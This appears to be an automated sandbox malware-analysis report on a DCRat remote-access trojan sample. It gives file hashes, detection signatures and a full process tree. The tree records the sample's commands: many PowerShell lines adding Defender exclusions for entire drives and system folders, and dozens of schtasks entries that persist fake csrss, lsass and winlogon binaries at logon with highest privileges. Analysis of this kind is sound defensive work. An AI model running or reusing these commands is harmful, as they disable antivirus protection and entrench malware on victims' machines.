Overview

overview

10

Static

static

10

51c3cebd8c...f0.exe

windows7-x64

10

51c3cebd8c...f0.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2022 17:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe

  • Size

    2.0MB

  • MD5

    fc9ea28a3c3659c4200e442d20198458

  • SHA1

    79ede873cd08d5941e54524dd85b5add0a79bd7c

  • SHA256

    51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0

  • SHA512

    c2357a0eb6fd31929af57c544be2de14b0daee2a731ec09e586b0ac748b7368ae5a022d0d8dae0ccece0fa860799a0da02405f60d86a963e177508b5e4220a17

  • SSDEEP

    49152:ubA3jVKbYcU6bWUfj4a7syRO2tzK/RNS/2t:ubjJXj4a4IKJYet

Score
10/10
dcratinfostealerrat

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Process spawned unexpected child process 64 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 20 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 16 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Program Files directory 39 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe
    "C:\Users\Admin\AppData\Local\Temp\51c3cebd8c8fe19e37b68c64218b4c4552aac4c804bd04ed372fd74d52668ff0.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4180
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\agentBrowsersavesRefBroker\metokn3Gpa5i.vbe"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4528
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\agentBrowsersavesRefBroker\DYj6G9.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2612
        • C:\agentBrowsersavesRefBroker\SurrogateDll.exe
          "C:\agentBrowsersavesRefBroker\SurrogateDll.exe"
          4⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Checks computer location settings
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4812
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/agentBrowsersavesRefBroker/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4152
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:968
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:820
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4560
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4200
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1120
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4632
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4256
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3248
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3452
          • C:\agentBrowsersavesRefBroker\SurrogateDll.exe
            "C:\agentBrowsersavesRefBroker\SurrogateDll.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3384
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4664
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:220
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/agentBrowsersavesRefBroker/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:5724
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:5744
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4916
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3372
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4208
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4080
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:972
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4912
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1132
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3832
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4776
            • C:\agentBrowsersavesRefBroker\powershell.exe
              "C:\agentBrowsersavesRefBroker\powershell.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3104
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\winlogon.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4560
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\winlogon.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:2340
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\winlogon.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1140
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\odt\fontdrvhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3200
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:1092
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4068
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft\Temp\cmd.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2992
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Temp\cmd.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1564
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft\Temp\cmd.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2724
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\csrss.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1008
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2212
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4616
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\Idle.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1884
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4112
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:628
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\WaaSMedicAgent.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4820
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files\Windows Security\WaaSMedicAgent.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3116
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\WaaSMedicAgent.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:3332
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2856
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2360
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:1788
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\agentBrowsersavesRefBroker\Idle.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2116
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\agentBrowsersavesRefBroker\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3340
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\agentBrowsersavesRefBroker\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3892
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\en-US\cmd.exe'" /f
    1⤵
    • Process spawned unexpected child process
    PID:1768
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\en-US\cmd.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5076
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\en-US\cmd.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:4236
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3104
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1944
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:1728
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\odt\fontdrvhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3628
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:480
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3952
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\agentBrowsersavesRefBroker\backgroundTaskHost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3144
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\agentBrowsersavesRefBroker\backgroundTaskHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4608
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\agentBrowsersavesRefBroker\backgroundTaskHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2780
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2576
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1816
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:8
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Containers\serviced\RuntimeBroker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2208
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4368
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\Containers\serviced\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4436
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    PID:544
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4480
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4724
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4756
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:4260
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:5044
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3956
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:224
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\agentBrowsersavesRefBroker\powershell.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5136
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\ja-JP\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5180
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5204
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5212
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\agentBrowsersavesRefBroker\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5236
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\Registry.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5260
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    PID:5292
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5316
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\powershell.exe'" /f
    1⤵
    • Process spawned unexpected child process
    PID:5348
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\SppExtComObj.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5372
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft\Temp\powershell.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5396
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft\Temp\powershell.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5412
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Temp\powershell.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5404
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\SppExtComObj.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5388
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\SppExtComObj.exe'" /rl HIGHEST /f
    1⤵
    • Creates scheduled task(s)
    PID:5380
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f
    1⤵
      PID:5364
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f
      1⤵
        PID:5356
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Creates scheduled task(s)
        PID:5340
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f
        1⤵
          PID:5332
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\conhost.exe'" /f
          1⤵
          • Creates scheduled task(s)
          PID:5324
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f
          1⤵
          • Creates scheduled task(s)
          PID:5308
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\powershell.exe'" /f
          1⤵
          • Creates scheduled task(s)
          PID:5300
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
          1⤵
          • Creates scheduled task(s)
          PID:5284
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\odt\backgroundTaskHost.exe'" /f
          1⤵
          • Creates scheduled task(s)
          PID:5276
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Start Menu\Registry.exe'" /rl HIGHEST /f
          1⤵
          • Creates scheduled task(s)
          PID:5268
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Start Menu\Registry.exe'" /f
          1⤵
            PID:5252
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\agentBrowsersavesRefBroker\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
              PID:5244
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\agentBrowsersavesRefBroker\RuntimeBroker.exe'" /f
              1⤵
              • Creates scheduled task(s)
              PID:5228
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
              1⤵
              • Creates scheduled task(s)
              PID:5220
